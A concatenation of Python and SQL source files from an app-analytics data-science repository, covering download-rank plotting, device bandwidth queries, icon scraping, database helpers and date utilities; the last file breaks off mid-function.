ax.set_title('%s_actuals by buckets of ranks'%function)
ax.grid(True, which='both')
ax.set_xlabel('Day')
ax.set_ylabel(function)
ax.legend(p, labels)
ax.xaxis.set_ticks(np.arange(0, len(weekdays)+1, 7))
#ax.set_xticklabels(weekdays)
plt.savefig(plots_dir+'stats/bucket_%s_%s_%s_%s.png'%(function, country, category, feed))
def get_weekdays(df):
ddf = df['date'].drop_duplicates().reset_index()['date']
dr = pd.DateRange(ddf.min(), ddf.max(), offset=pd.datetools.Day())
weekdays = []
for date in dr:
weekdays.append(date.weekday()+1)
return weekdays
if __name__ == '__main__':
plots_dir = './plots/'
actuals_file = './cache/references/real_units_143441_2012-07_Downloads.csv'
downloads_file = './cache/monthly/United States_2012-07_Downloads.csv'
country = 143441
category = 36
feed = 0
df = pd.read_csv(downloads_file)
#df = filter_out_universals(df)
#plot_stats(df, country)
#plot_rank_buckets(df, country, 'count', 200)
#plot_rank_buckets(df, country, 'sum', 200)
plot_rank_buckets(df, country, 'avg', 200)
sys.exit(0)
df = pd.read_csv(downloads_file)
df = df[['category_id', 'rank', 'app_id', 'date', 'feed_id', 'store_id', 'units']]
df = df[df['category_id'] == category]
df = df[df['feed_id'] == feed]
train_set, test_set, weights = build_model(df,20)
train_set = append_weekdays(train_set)
test_set = append_weekdays(test_set)
prefix = 'Filtered_'
plot_sets(train_set, test_set, 1000, fig_file=plots_dir+prefix+'Base_model_top1000.png')
plot_sets(train_set, test_set, 50, fig_file=plots_dir+prefix+'Base_model_top50.png')
plot_sets(train_set, test_set, 20, fig_file=plots_dir+prefix+'Base_model_top20.png')
train_set, test_set, weights = build_model(df, 20, 123456789)
train_set = append_weekdays(train_set)
test_set = append_weekdays(test_set)
plot_sets(train_set, test_set, 1000, weights=True, fig_file=plots_dir+prefix+'Scaled_model_top1000.png')
plot_sets(train_set, test_set, 50, weights=True, fig_file=plots_dir+prefix+'Scaled_model_top50.png')
plot_sets(train_set, test_set, 20, weights=True, fig_file=plots_dir+prefix+'Scaled_model_top20.png')
plot_weights(weights, plots_dir+prefix+'Weights.png')
prefix = 'Filtered_Actuals_123456789_'
plot_sets(train_set, test_set, 1000, weights=True, fig_file=plots_dir+prefix+'Scaled_model_top1000.png', plot_actuals=True)
plot_sets(train_set, test_set, 50, weights=True, fig_file=plots_dir+prefix+'Scaled_model_top50.png', plot_actuals=True)
plot_sets(train_set, test_set, 20, weights=True, fig_file=plots_dir+prefix+'Scaled_model_top20.png', plot_actuals=True)
train_set, test_set, weights = build_model(df, 20, 1)
train_set = append_weekdays(train_set)
test_set = append_weekdays(test_set)
prefix = 'Filtered_Actuals_1_'
plot_sets(train_set, test_set, 1000, weights=True, fig_file=plots_dir+prefix+'Scaled_model_top1000.png', plot_actuals=True)
plot_sets(train_set, test_set, 50, weights=True, fig_file=plots_dir+prefix+'Scaled_model_top50.png', plot_actuals=True)
plot_sets(train_set, test_set, 20, weights=True, fig_file=plots_dir+prefix+'Scaled_model_top20.png', plot_actuals=True)
train_set, test_set, weights = build_model(df, 20, 100000)
train_set = append_weekdays(train_set)
test_set = append_weekdays(test_set)
prefix = 'Filtered_Actuals_100000_'
plot_sets(train_set, test_set, 1000, weights=True, fig_file=plots_dir+prefix+'Scaled_model_top1000.png', plot_actuals=True)
plot_sets(train_set, test_set, 50, weights=True, fig_file=plots_dir+prefix+'Scaled_model_top50.png', plot_actuals=True)
plot_sets(train_set, test_set, 20, weights=True, fig_file=plots_dir+prefix+'Scaled_model_top20.png', plot_actuals=True)
df = get_ranked_apps(actuals_file)
df = df[df['category_id'] == category]
df = df[df['feed_id'] == feed]
train_set, test_set, weights = build_model(df,20)
train_set = append_weekdays(train_set)
test_set = append_weekdays(test_set)
prefix = 'Unfiltered_'
plot_sets(train_set, test_set, 1000, fig_file=plots_dir+prefix+'Base_model_top1000.png')
plot_sets(train_set, test_set, 50, fig_file=plots_dir+prefix+'Base_model_top50.png')
plot_sets(train_set, test_set, 20, fig_file=plots_dir+prefix+'Base_model_top20.png')
train_set, test_set, weights = build_model(df, 20, 123456789)
train_set = append_weekdays(train_set)
test_set = append_weekdays(test_set)
plot_sets(train_set, test_set, 1000, weights=True, fig_file=plots_dir+prefix+'Scaled_model_top1000.png')
plot_sets(train_set, test_set, 50, weights=True, fig_file=plots_dir+prefix+'Scaled_model_top50.png')
plot_sets(train_set, test_set, 20, weights=True, fig_file=plots_dir+prefix+'Scaled_model_top20.png')
plot_weights(weights, plots_dir+prefix+'Weights.png')
df = pd.read_csv('./data_merged/United States_2012-07-01--2012-07-31_Downloads.csv')
df.rename(columns={'original_estimate': 'estimate', 'weighted_estimate': 'scaled_estimate'}, inplace=True)
df = df[['category_id', 'rank', 'app_id', 'date', 'feed_id', 'store_id', 'units', 'estimate', 'scaled_estimate']]
df = df[df['category_id'] == category]
df = df[df['feed_id'] == feed]
df['weight'] = 1.0
#weights = pd.read_csv('./cache/143441_36_weigths.csv')
#weights = weights[weights['category_id'] == 36]
#weights = weights[weights['feed_id'] == 0]
#weights = weights[['date', 'weight']]
#df = df.merge(weights, on='date')
df['date'] = df['date'].map(lambda x: x.replace(' 00:00:00',''))
train_set, test_set = split_train_test(df,20)
prefix = 'Production_Filtered_'
train_set = append_weekdays(train_set)
test_set = append_weekdays(test_set)
plot_sets(train_set, test_set, 1000, fig_file=plots_dir+prefix+'Base_model_top1000.png')
plot_sets(train_set, test_set, 50, fig_file=plots_dir+prefix+'Base_model_top50.png')
plot_sets(train_set, test_set, 20, fig_file=plots_dir+prefix+'Base_model_top20.png')
plot_sets(train_set, test_set, 1000, weights=True, fig_file=plots_dir+prefix+'Scaled_model_top1000.png')
plot_sets(train_set, test_set, 50, weights=True, fig_file=plots_dir+prefix+'Scaled_model_top50.png')
plot_sets(train_set, test_set, 20, weights=True, fig_file=plots_dir+prefix+'Scaled_model_top20.png')
#plot_weights(weights, plots_dir+prefix+'Weights.png')
<file_sep>/aa_au_model/heavy_usage/sql/get_monthly_device_bandwidth.sql
-- Get monthly bandwidth per device for iOS on VPN Defender
set start_date = '2015-03-01';
set end_date = '2015-05-31';
drop table if exists ios_device_bandwidth;
create table ios_device_bandwidth (
device_id string,
device_type string,
year int,
month int,
total_bandwidth float)
row format delimited fields terminated by '\t'
lines terminated by '\n'
stored as textfile
location 's3://aardvark-prod-pdx-ds-workspace/whales/ios_device_bandwidth'
;
insert overwrite table ios_device_bandwidth
select
x.device_id,
x.type as device_type,
x.year,
x.month,
x.total_bandwidth
from (
select
c.device_id,
max(d.type) as type,
year(c.datestr) as year,
month(c.datestr) as month,
sum(c.output_bytes + c.input_bytes) / 1073741824 as total_bandwidth
from
vpn_new_device_info d
join vpn_sample_data_connection_session c
on d.device_id = c.device_id
where
d.platform = 'iOS'
and c.datestr between ${hiveconf:start_date} and ${hiveconf:end_date}
group by
year(c.datestr),
month(c.datestr),
c.device_id
order by
device_id desc
) x
;<file_sep>/aa_au_model/mdm/mdm/__init__.py
__author__ = 'hgriffioen'
import data
import hashlib
def hash_guid(guid, platform):
"""
Hash the GUID to the format used by Aardvark backend.
:param guid: Series with GUIDs
:param platform: Series with platforms for GUIDs
:return: Series with hashed GUIDs
Example:
$ dim_guid = mdm.data.load_dim_guid()
$ dim_guid['hashed_guid'] = hash_guid(dim_guid.guid, dim_guid.device_platform)
"""
denormalized_guid = guid.copy()
# iOS GUIDs are send denormalized to Backend but are normalized in the table.
is_ios = platform == 'ios'
denormalized_guid[is_ios] = guid[is_ios].apply(denormalize_ios_guid)
return denormalized_guid.apply(lambda x: hashlib.sha256(x).hexdigest())
def denormalize_ios_guid(g):
"""
Convert a normalized iOS GUID to denormalized format.
For instance, 006cd3b1feb041c98ae223eacfbad2e0 is converted to
006CD3B1-FEB0-41C9-8AE2-23EACFBAD2E0.
:param g: String with normalized GUID
:return: String with denormalized GUID
"""
return '-'.join((g[0:8], g[8:12], g[12:16], g[16:20], g[20:])).upper()<file_sep>/icon-matching-framework/lib/scraping.py
"""
Module for scraping. Main functions:
- scrape_icons: Scrape all icons for matched apps.
Note that the hierarchy of saving the icons is similar to how they are scraped:
- scraping: $ASSET_URL$/$MARKET$/$ICON_URL$
- saving: $ICON_DIR$/$MARKET$/$ICON_URL$
See constants.py for constants.
"""
import errno
import database_interface
import icon_processing
import multiprocessing
import numpy as np
import os
import pandas as pd
import shutil
import time
from config import (ICON_DIR, N_PARALLEL_SCRAPING)
ICON_TO_FILTER = icon_processing.get_no_icon()
def scrape_icons(connection=None):
"""
Scrape all icons for Distimo's matched apps.
:param connection: Connection to database
:return: None
"""
clear_icon_dirs()
create_icon_dirs()
matched_apps = get_matched_apps(connection)
icon_urls = generate_icon_urls(matched_apps)
icon_paths = generate_icon_paths(matched_apps)
icon_data_set = zip(icon_urls, icon_paths)
retrieve_icons(icon_data_set)
def scrape_icons_aa(market):
"""
Scrape all icons for AA's matched apps. Loads AA's matched apps from data/matched_$MARKET$)_apps.csv.
See Notebook 'Get AA Android and iOS matches' for creating this csv.
:param market: Market to scrape: 'ios' or 'gp'
:return: None
"""
clear_icon_dirs([market])
create_icon_dirs([market])
matched_apps = pd.DataFrame.from_csv('data/matched_' + market + '_apps.csv', index_col=False)
matched_apps = matched_apps.ix[matched_apps.icon_url.notnull()]
icon_urls = matched_apps.icon_url.values
icon_paths = generate_icon_paths(matched_apps)
icon_data_set = zip(icon_urls, icon_paths)
retrieve_icons_sequentially(icon_data_set)
def clear_icon_dirs(store_ids=None):
"""
Delete subdirectories in icons/ folder.
:param store_ids: List with store IDs to clear (e.g. [1, 2], ['gp'] or ['gp', 'ios', 1]).
:return: None
"""
if store_ids is None:
store_ids = [1, 2, 10]
icon_dir_path = lambda x: os.getcwd() + '/' + ICON_DIR + str(x)
map(shutil.rmtree, map(icon_dir_path, store_ids))
def create_icon_dirs(store_ids=None):
"""
Create directories for markets.
:param store_ids: List with store IDs to create (e.g. [1, 2], ['gp'] or ['gp', 'ios', 1]).
:return: None
"""
if store_ids is None:
store_ids = [1, 2, 10]
icon_path = lambda x: os.getcwd() + '/' + ICON_DIR + str(x) + '/'
map(mkdir_p, map(icon_path, store_ids))
def mkdir_p(path):
"""
Create directory.
:param path: Path to directory
:return: None
"""
try:
os.makedirs(path)
except OSError as exc: # Python >2.5
if exc.errno == errno.EEXIST and os.path.isdir(path):
pass
else:
raise
def get_matched_apps(connection=None):
"""
Get all matched apps.
:param connection: Connection to database
:return: DataFrame with matched apps
"""
dbi = database_interface.DistimoDatabase(connection)
return dbi.query_matched_apps()
def generate_icon_paths(matched_apps):
"""
Generate local paths to the icons.
:param matched_apps: DataFrame with matched apps.
:return: Lists with strings containing local paths.
"""
icon_names = ICON_DIR + matched_apps['market'].astype(str) + '/' + matched_apps['id'].astype(str)
return icon_names.values.tolist()
def generate_icon_urls(matched_apps, asset_url=None):
"""
Generate urls to icons.
:param matched_apps: DataFrame with matched apps.
:param asset_url: Url to retrieve icons from
:return:
"""
icon_urls = ICON_DIR + matched_apps['market'].astype(str) + '/' + matched_apps['icon_url']
if asset_url is None:
generate_asset_url = lambda x: ('http://assets-0%s.distimo.com/' %
str(np.random.randint(1, 4))) + x + '?size=64'
else:
generate_asset_url = lambda x: asset_url + x
return map(generate_asset_url, icon_urls)
def retrieve_icons(icon_data_set, n_parallel=N_PARALLEL_SCRAPING):
"""
Retrieve all icons using parallel processing.
:param icon_data_set: List of lists containing icon paths and urls
:return: None
"""
pool = multiprocessing.Pool(n_parallel)
pool.map(get_image, icon_data_set)
def retrieve_icons_sequentially(icon_data_set, sleep=None):
"""
Retrieve all icons sequentially.
:param icon_data_set: List of lists containing icon paths and urls
:param sleep: Time to sleep
:return: None
"""
for icon_path, icon_url in icon_data_set:
icon_processing.get_raw_image(icon_path, icon_url)
if sleep:
time.sleep(sleep)
def get_image(icon_data):
"""
Wrapper for calling icon_processing.get_raw_image.
:param icon_data: List with icon URL and filename to save to
:return: None
"""
icon_processing.get_raw_image(icon_data[0], filename=icon_data[1], raw_filter_image=ICON_TO_FILTER)
<file_sep>/ranking_change/test_read_rank_files.py
#!/usr/bin/env python
from read_rank_files import *
#df = load_ranks_file('/Users/riwatt/Work/new_ranks/ranking_2013-07-01.sql', ['United States'], ['36', '6014'])#, 'Germany'])
df = load_ranks_file('/Users/riwatt/Work/new_ranks/ranking_2013-07-01.sql', ['United States', 'Germany'])
df.to_csv('ranking-2013-07-01-US.csv', index=False)
<file_sep>/exact-matching-improvement/lib/temp_database.py
import pandas as pd
import config as cf
import psycopg2
from queries import db_links, ios_queries, android_queries, general_queries, metric_queries
'''
library that manages interaction between IPython notebooks and DS temp database
'''
def create_aa_connection_from_config():
return psycopg2.connect(database=cf.database, user=cf.user, password=<PASSWORD>, host=cf.host)
def create_temp_connection_from_config():
return psycopg2.connect(database=cf.database, user=cf.user, password=<PASSWORD>, host=cf.temp_host)
def generate_ios_features(connection=None, regenerate=False):
result = None
if connection is None:
connection = create_temp_connection_from_config()
if regenerate:
cur = connection.cursor()
cur.execute(db_links['ios_link'])
cur.execute(ios_queries['drop_ios_matches'])
cur.execute(ios_queries['create_ios_matches'])
cur.execute(ios_queries['drop_ios_apps'])
cur.execute(ios_queries['create_ios_apps'])
cur.execute(ios_queries['create_ios_features'])
connection.commit()
result = pd.read_sql(ios_queries['select_ios_features'], connection)
connection.close()
return result
def generate_android_features(connection=None, regenerate=False):
if connection is None:
connection = create_temp_connection_from_config()
if regenerate:
cur = connection.cursor()
cur.execute(db_links['ios_link'])
cur.execute(db_links['android_link'])
cur.execute(android_queries['drop_android_matches'])
cur.execute(android_queries['create_android_matches'])
cur.execute(android_queries['drop_android_apps'])
cur.execute(android_queries['create_android_apps'])
cur.execute(android_queries['create_android_features'])
connection.commit()
result = pd.read_sql(android_queries['select_android_features'], connection)
connection.close()
return result
def generate_all_features(connection=None, regenerate=False):
if connection is None:
connection = create_temp_connection_from_config()
if regenerate:
cur = connection.cursor()
cur.execute(db_links['ios_link'])
cur.execute(db_links['android_link'])
cur.execute(android_queries['drop_android_matches'])
cur.execute(android_queries['create_android_matches'])
cur.execute(android_queries['drop_android_apps'])
cur.execute(android_queries['create_android_apps'])
cur.execute(ios_queries['drop_ios_matches'])
cur.execute(ios_queries['create_ios_matches'])
cur.execute(ios_queries['drop_ios_apps'])
cur.execute(ios_queries['create_ios_apps'])
cur.execute(general_queries['create_all_features'])
connection.commit()
result = pd.read_sql(general_queries['select_all_features'], connection)
connection.close()
return result
def generate_excluded_term_list(connection=None, type=None):
result = None
if connection is None:
connection = create_aa_connection_from_config()
cur = connection.cursor()
cur.execute(db_links['ios_link']) # use ios_link since dna data is stored in aa database
sql_result = pd.read_sql(general_queries['select_dna_excluded_terms'].format(type=type), connection)
result = sql_result.iloc[0, 0].split('\n')
connection.close()
return result
def create_new_processed_feature_table(df, new_feature_name, new_feature_type, connection=None):
if connection is None:
connection = create_temp_connection_from_config()
cur = connection.cursor()
cur.execute(general_queries['drop_processed_dna_feature'].format(new_feature=new_feature_name))
cur.execute(general_queries['create_processed_dna_feature_table'].format(new_feature=new_feature_name
, feature_type=new_feature_type))
insert_statement = general_queries['insert_processed_dna_feature'].format(new_feature=new_feature_name
, feature_type=new_feature_type)
cur.executemany(insert_statement, df.T.to_dict().values())
connection.commit()
connection.close()
def create_new_levenshtein_metric_table(feature_name, feature_table_name, connection=None):
if connection is None:
connection = create_temp_connection_from_config()
cur = connection.cursor()
cur.execute(metric_queries['create_dna_levenshtein_metric_table'].format(feature_name=feature_name
, feature_table_name=feature_table_name))
connection.commit()
connection.close()
def create_new_extended_levenshtein_metric_table(feature_name, original_feature_name, feature_table_name, connection=None):
if connection is None:
connection = create_temp_connection_from_config()
cur = connection.cursor()
cur.execute(metric_queries['create_dna_extended_levenshtein_metric_table'].format(feature_name=feature_name
, original_feature_name=original_feature_name
, feature_table_name=feature_table_name))
connection.commit()
connection.close()
def get_metric_for_feature(feature_name, match_criterion=None, connection=None):
if connection is None:
connection = create_temp_connection_from_config()
if match_criterion is None:
result = pd.read_sql(metric_queries['select_dna_metric_levenshtein'].
format(feature_name=feature_name), connection)
else:
result = pd.read_sql(metric_queries['select_dna_metric_levenshtein_with_citerion'].
format(feature_name=feature_name, match_criterion=match_criterion), connection)
connection.commit()
connection.close()
return result
def get_sample_metric_for_feature_app(feature_name, n_apps=1, connection=None):
if connection is None:
connection = create_temp_connection_from_config()
result = pd.read_sql(metric_queries['select_dna_metric_levenshtein_sample_app'].
format(feature_name=feature_name, n_apps=n_apps), connection)
connection.commit()
connection.close()
return result
def get_sample_from_table(table_name, num_samples=1000000, connection=None):
if connection is None:
connection = create_temp_connection_from_config()
result = pd.read_sql(metric_queries['select_dna_sample'].
format(table_name=table_name, num_samples=num_samples), connection)
connection.commit()
connection.close()
return result
def get_extended_metric_for_feature(feature_name, criterion, lower_bound, upper_bound, connection=None):
if connection is None:
connection = create_temp_connection_from_config()
result = pd.read_sql(metric_queries['select_dna_metric_levenshtein_extended'].
format(feature_name=feature_name, criterion=criterion, lower_bound=lower_bound,
upper_bound=upper_bound), connection)
connection.commit()
connection.close()
return result
def get_confusion_matrix(type, label, table, feature_name, threshold_value=1.0, connection=None):
if connection is None:
connection = create_temp_connection_from_config()
if type == 'real':
result = pd.read_sql(metric_queries['select_confusion_matrix_real'].
format(feature_name=feature_name, threshold_value=threshold_value, label=label,
table=table), connection)
elif type == 'bool':
result = pd.read_sql(metric_queries['select_confusion_matrix_bool'].
format(feature_name=feature_name, threshold_value=threshold_value, label=label,
table=table), connection)
connection.commit()
connection.close()
return result
def get_icon_input(connection=None):
if connection is None:
connection = create_temp_connection_from_config()
result = pd.read_sql(general_queries['select_icon_input'], connection)
connection.commit()
connection.close()
return result
<file_sep>/evaluation/py/concat_results.py
'''
Created on Jul 1, 2013
@author: perezrafael
'''
import pandas as pd
import numpy as np
import os
if __name__ == '__main__':
dfs = []
for (dirpath, dirnames, filenames) in os.walk('../data'):
for filename in filenames:
if filename == 'result.csv':
metadata = dirpath.split('/')
device = metadata[2].split('_')[0]
model = '_'.join(metadata[2].split('_')[1:])
month = metadata[3]
filepath = os.sep.join([dirpath, filename])
df = pd.read_csv(filepath)
df['device'] = device
df['model'] = model
df['month'] = month
dfs.append(df)
df = pd.concat(dfs)
df.sort(['device','model', 'month', 'period', 'unit', 'country'], inplace=True)
df.to_csv('../data/all_results.csv',index=False)
<file_sep>/int-vs-m-benchmark/sql/ios/1000f2-refine_application_data-recheck_price_changes.sql
/*
FUNCTIONAL DESCRIPTION : Check for price changes for the total time period in a country.
*/
DROP TEMPORARY TABLE IF EXISTS temp.apps_with_price_changes;
CREATE TEMPORARY TABLE temp.apps_with_price_changes(
country_id smallint(5) unsigned NOT NULL,
application_id INT(10) UNSIGNED NOT NULL,
CONSTRAINT PRIMARY KEY (country_id, application_id)
)
AS
select
country_id,
application_id,
max(price_changed) as price_changed
from
temp.application_data
group by
country_id,
application_id
having
price_changed = 1
;
UPDATE temp.application_data d
JOIN temp.apps_with_price_changes p
ON p.country_id = d.country_id
AND p.application_id = d.application_id
SET d.price_changed = 1;<file_sep>/google-analytics/rincon_dump/validation_exporter.py
import dill
import copy
import pandas as pd
import numpy as np
cntry_list = ['US','GB']
dev_list = ['iPhone','Android Mobile']
modelName = 'logLog'
for cntry in cntry_list:
for dev in dev_list:
# convert the strings to lists which can be iteratible
if type(cntry) == str:
cntry = [cntry]
if type(dev) == str:
dev = [dev]
print cntry, dev
fileObject = open('./class/{}/Rincon_Class_{}_{}.dill'.format(modelName, cntry[0], dev[0]), 'r')
new_class_ = dill.load(fileObject)
mdm_dat = pd.read_csv('../data/MDM_0118_AppNameAttached.csv')
mdm_dat['category_id'] = mdm_dat['category_id'].apply(int).apply(str)
val_data = mdm_dat[(mdm_dat['Country'].isin(cntry))
& (mdm_dat['Device Type'].isin(dev))
].copy()
fileObject.close()
pred_new = new_class_[0].predict(val_data)
pred_new['diff'] = pred_new['final_pred'] - pred_new['reporters_app']
pred_new['diff%'] = pred_new['final_pred'] / pred_new['reporters_app'] - 1.0
pred_new.sort('diff', ascending=False)[:1000].to_csv('./temp/{}/Top100_Diff_{}_{}.csv'.\
format(modelName, cntry, dev), index=False, header=False)
pred_new.sort('diff', ascending=True)[:1000].to_csv('./temp/{}/Top100_MinusDiff_{}_{}.csv'.\
format(modelName, cntry, dev), index=False, header=False)
pred_new.sort('diff%', ascending=False)[:1000].to_csv('./temp/{}/Top100_Diff%_{}_{}.csv'.\
format(modelName, cntry, dev), index=False, header=False)
pred_new.sort('diff%', ascending=True)[:1000].to_csv('./temp/{}/Top100_MinusDiff%_{}_{}.csv'.\
format(modelName, cntry, dev), index=False, header=False)
pred_new.groupby(['Country', 'Device Type', 'Date', 'bundle_id', 'app_id',
'app_name','category_name','final_pred']).\
agg({'reporters_app':'sum'})['reporters_app'].\
groupby(level=['Country', 'Device Type', 'Date'], group_keys=False).\
apply(lambda x: x.order(ascending=False).head(200)).\
to_csv('./temp/{}/Top200_MAU_{}_{}.csv'.format(modelName, cntry, dev), index=True, header=False)
<file_sep>/aa_au_model/correction/utils.py
__author__ = 'hgriffioen'
import datetime
import numpy as np
import pandas as pd
import sklearn
from sklearn import preprocessing
def get_start_date(end_date, time_frame):
"""
Get start date for an end date.
:param end_date: datetime.date with period end
:param time_frame: time frame ('weekly' or 'monthly')
:return: datetime.date with period start
"""
validate_end_date(end_date, time_frame)
if time_frame == 'weekly':
start_date = end_date - datetime.timedelta(days=6)
elif time_frame == 'monthly':
start_date = end_date.replace(day=1)
else:
raise Exception('Unknown time frame: %s' % time_frame)
return start_date
def get_end_date(start_date, time_frame):
"""
Get end date for a start date.
:param start_date: datetime.date with any date
:param time_frame: time frame ('weekly' or 'monthly')
:return: datetime.date with period end
"""
validate_start_date(start_date, time_frame)
if time_frame == 'weekly':
end_date = start_date + datetime.timedelta(days=(6-(start_date.isoweekday() % 7)))
elif time_frame == 'monthly':
next_month = (start_date.month % 12 + 1, start_date.year + start_date.month / 12)
end_date = (start_date.replace(month=next_month[0], year=next_month[1], day=1) -
datetime.timedelta(days=1))
else:
raise Exception('Unknown time frame: %s' % time_frame)
return end_date
def generate_date_range(period_start, period_end, time_frame):
"""
Generate valid date range.
:param period_start: datetime.date with period start
:param period_end: datetime.date with period start
:param time_frame: time frame ('weekly' or 'monthly')
:return: list with datetime.date objects
"""
validate_start_date(period_start, time_frame)
validate_start_date(period_end, time_frame)
if time_frame == 'weekly':
timestamp_range = pd.date_range(period_start, period_end, freq='W')
elif time_frame == 'monthly':
# Add month because monthly intervals are not inclusive on both sides
end_month = period_end.replace(month=period_end.month+1)
timestamp_range = pd.date_range(period_start, end_month, freq='M')
timestamp_range = timestamp_range.shift(n=-1, freq='M').shift(n=1, freq='d')
else:
raise Exception('Unknown time frame: %s' % time_frame)
return timestamp_range.date
def validate_start_date(start_date, time_frame):
"""
Check if the start_date is valid.
:param start_date: datetime.date with period start
:param time_frame: time frame ('weekly' or 'monthly')
:return: None
"""
is_valid = check_date(start_date, time_frame, 'start')
if not is_valid:
if time_frame == 'weekly':
raise Exception('Date should be a Sunday')
elif time_frame == 'monthly':
raise Exception('Date should be first day of the month')
def validate_end_date(end_date, time_frame):
"""
Check if the end_date is valid.
:param end_date: datetime.date with period end
:param time_frame: time frame ('weekly' or 'monthly')
:return: None
"""
is_valid = check_date(end_date, time_frame, 'end')
if not is_valid:
if time_frame == 'weekly':
raise Exception('Date should be a Saturday')
elif time_frame == 'monthly':
raise Exception('Date should be last day of the month')
def check_date(date, time_frame, kind):
"""
Check start or end date.
:param date: datetime.date to check
:param time_frame: time frame to check ('weekly' or 'monthly')
:param kind: kind of date 'start' or 'end'
:return: boolean indicating if it's a valid date
"""
if time_frame == 'weekly' and kind == 'start':
is_valid = (date.isoweekday() == 7)
elif time_frame == 'monthly' and kind == 'start':
is_valid = (date.day == 1)
elif time_frame == 'weekly' and kind == 'end':
is_valid = date.isoweekday() == 6
elif time_frame == 'monthly' and kind == 'end':
next_month = [(date.month + 1) % 12, date.year + (date.month + 1 - 1) / 12]
if next_month[0] == 0:
next_month[0] = 12
last_date_of_month = (date.replace(day=1, month=next_month[0], year=next_month[1]) -
datetime.timedelta(days=1))
is_valid = (date == last_date_of_month)
else:
raise Exception('Unknown time frame or kind: %s, %s' % (time_frame, kind))
return is_valid
def get_weekly_end_dates_in_month(month_end):
"""
Get all end dates of weekly periods that are contained within the month.
:param month_end: Last date of the month
:return: List with end_dates for the weeks fully contained in the month
"""
month_start = get_start_date(month_end, 'monthly')
week_end = month_start
valid_week_ends = []
while week_end <= month_end:
is_valid_end_date = check_date(week_end, 'weekly', 'end')
if is_valid_end_date:
week_start = get_start_date(week_end, 'weekly')
if week_start >= month_start:
valid_week_ends.append(week_end)
week_end += datetime.timedelta(days=1)
return valid_week_ends
def multiclass_roc_auc_score(y_true, y_score, label_binarizer=None, **kwargs):
"""
Compute ROC AUC score for multiclass.
:param y_true: true multiclass predictions [n_samples]
:param y_score: multiclass scores [n_samples, n_classes]
:param label_binarizer: Binarizer to use (sklearn.preprocessing.LabelBinarizer())
:param kwargs: Additional keyword arguments for sklearn.metrics.roc_auc_score
:return: Multiclass ROC AUC score
"""
if label_binarizer is None:
label_binarizer = sklearn.preprocessing.LabelBinarizer()
binarized_true = label_binarizer.fit_transform(y_true)
score = sklearn.metrics.roc_auc_score(binarized_true, y_score, **kwargs)
return score
def get_week_end(date):
"""
Get the last Saturday of the week of data x
:param date: datetime.date for which last Saturday of the week is calculated
"""
return date + datetime.timedelta(days = 6 - (date + datetime.timedelta(days=1)).weekday())
def dataframe_size(df):
"""
Return a dict with the size of DataFrame components in MB.
:param df: pandas.DataFrame
:return dictionary with index, columns, values and total size
"""
byte_megabyte_factor = 1024 ** 2
size = dict(zip(['index', 'columns', 'values'],
np.array([df.index.nbytes, df.columns.nbytes,
df.values.nbytes]) / byte_megabyte_factor))
size['total'] = np.sum(size.values())
return size
def prettify_app_name(app_name, n_words=5, max_char=20):
"""
Prettify app name for outputting. Cuts of the app name for a max mumber of words and characters.
:param app_name: String with app name
:param n_words: Maximum allowed number of words
:param max_char: Maximum allowed number of characters
:return: String
"""
if type(app_name) in (str, unicode):
without_dashes = app_name.replace('-', '')
first_words_fcn = lambda x: ' '.join(x[:n_words]) if type(x) is list else '-'
first_words = first_words_fcn(without_dashes.split())
if len(first_words) > max_char:
truncated = first_words[:max_char] + '...'
else:
truncated = first_words
else:
truncated = '-'
truncated = truncated.decode(errors='ignore') # Fix ASCI/unicode errors
return truncated
class OrderedLabelEncoder(preprocessing.LabelEncoder):
"""Encode labels with value between 0 and n_classes-1 in specified order.
See also
--------
sklearn.preprocessing.LabelEncoder
"""
def __init__(self, classes):
self.classes_ = np.array(classes, dtype='O')
def fit(self, y):
""" Deprecated method.
"""
raise Exception('Invalid method: method is deprecated')
def fit_transform(self, y):
""" Deprecated method.
"""
raise Exception('Invalid method: method is deprecated')
def transform(self, y):
"""Transform labels to normalized encoding.
Parameters
----------
y : array-like of shape [n_samples]
Target values.
Returns
-------
y : array-like of shape [n_samples]
"""
self._check_fitted()
classes = np.array(np.unique(y), dtype='O')
preprocessing.label._check_numpy_unicode_bug(classes)
if len(np.intersect1d(classes, self.classes_)) < len(classes):
diff = np.setdiff1d(classes, self.classes_)
raise ValueError("y contains new labels: %s" % str(diff))
transformed_y = np.zeros_like(y, dtype=int)
for i_class, current_class in enumerate(self.classes_):
transformed_y[np.array(y) == current_class] = i_class
return transformed_y
<file_sep>/evaluation/py/generate_plots.py
"""
@Note: The range start from 1
"""
# Author: <NAME> <<EMAIL>>
import os
import os.path
from optparse import OptionParser
import pandas as pd
import matplotlib.pyplot as plt
import numpy as np
def parse_options():
parser = OptionParser()
parser.add_option("-r", "--rankrange", dest="rank_range",
help="Required. The range of ranks (by unit values) that we care. START FROM 1. e.g. 1-100")
(opts, args) = parser.parse_args()
opts.rank_range = map(int, opts.rank_range.split('-'))
return (opts, args)
def main():
(opts, args) = parse_options()
input_dir = args[0]
output_dir = args[1]
# It should contain both estimation and real values.
estreal_files = filter(lambda s: s.endswith('.csv'), os.listdir(input_dir))
for f in estreal_files:
input_full_path = os.path.join(input_dir, f)
output_full_path = os.path.join(output_dir, f)
_generate_plots(pd.read_csv(input_full_path), output_full_path.replace('.csv', '.png'),
rank_range=opts.rank_range,
title=f)
def _generate_plots(df, output_file, rank_range, title):
df_top = df.sort('units', ascending=False)[(rank_range[0] - 1):rank_range[1]]
def _real_vs_est_plot():
plt.figure()
ax = plt.subplot(111)
# Plot points
plt.plot(df_top['units'].values, df_top['estimate'].values, '.', markersize=12, alpha=0.4)
# Plot the line y = x
x1, x2, y1, y2 = plt.axis()
xx = np.linspace(x1, x2)
plt.plot(xx, xx, 'k--')
plt.xlabel("Real Values")
plt.ylabel("Estimation")
plt.title(title)
plt.savefig(output_file.replace(".png", "_RvsE.png"))
ax.set_xscale('log')
ax.set_yscale('log')
plt.savefig(output_file.replace(".png", "_RvsE_log.png"))
_real_vs_est_plot()
if __name__ == '__main__':
main()
<file_sep>/audience/loaded_dice/lib/loaded_dice.py
__author__ = 'srhmtonk'
import numpy as np
def estimate_p(x, prior='Jeffreys'):
'''
Estimate the event probabilities p for each set of event counts x, assuming each of these sets of counts come from some
multinomial distribution.
:param x: array-like, shape (n_observations, n_events)
Array containing the different observed event counts.
:param prior: string, optional
String specifying the prior that should be used in the process if estimating the event probabilities from a
drawn sample. Currently only Jeffrey's prior is supported, different option will all go for ML estimate instead
of posterior (defaults to Jeffreys)
:return: numpy arrays, shape (n_observations,n_events)
Array giving the estimated event probabilities for each observed set of counts.
'''
if type(x) is not np.ndarray:
x = np.array(x).astype(float)
if prior=='Jeffreys':
#add Jeffrey's prior
